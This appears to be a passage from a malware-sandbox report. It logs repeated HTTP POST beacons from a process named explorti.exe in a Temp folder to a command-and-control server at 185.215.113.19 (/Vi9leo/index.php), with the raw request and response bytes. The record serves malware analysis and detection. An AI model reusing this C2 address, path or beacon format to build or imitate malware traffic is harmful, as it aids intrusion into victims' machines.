                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.449753185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:22.395454884 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:23.145682096 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:23.146363020 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:23.392704010 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.449754185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:23.502688885 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:24.261826038 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:24.262581110 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:24.510602951 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.449755185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:24.625963926 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:25.383291960 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:25.384377956 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:25.643799067 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.449756185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:25.773972034 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:26.563147068 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:26.564135075 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:26.812366962 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.449757185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:27.133981943 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:27.894509077 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:27.895405054 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:28.145915985 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.449758185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:28.269089937 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:29.010404110 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:29.011056900 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:29.257996082 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.449759185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:29.375608921 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:30.133560896 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:30.136085033 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:30.398397923 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.449760185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:30.517441034 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:31.298367023 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:31.299105883 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:31.552133083 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.449761185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:31.672142982 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:32.427648067 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:32.428349972 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:32.685292006 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.449762185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:32.796787024 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:33.541835070 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:33.542690992 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:33.794807911 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.449763185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:33.907682896 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:34.685813904 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:34.686503887 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:34.942203999 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.449764185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:35.063901901 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:35.814773083 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:35.815455914 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:36.064908981 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.449765185.215.113.19806200C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 20:57:36.184197903 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
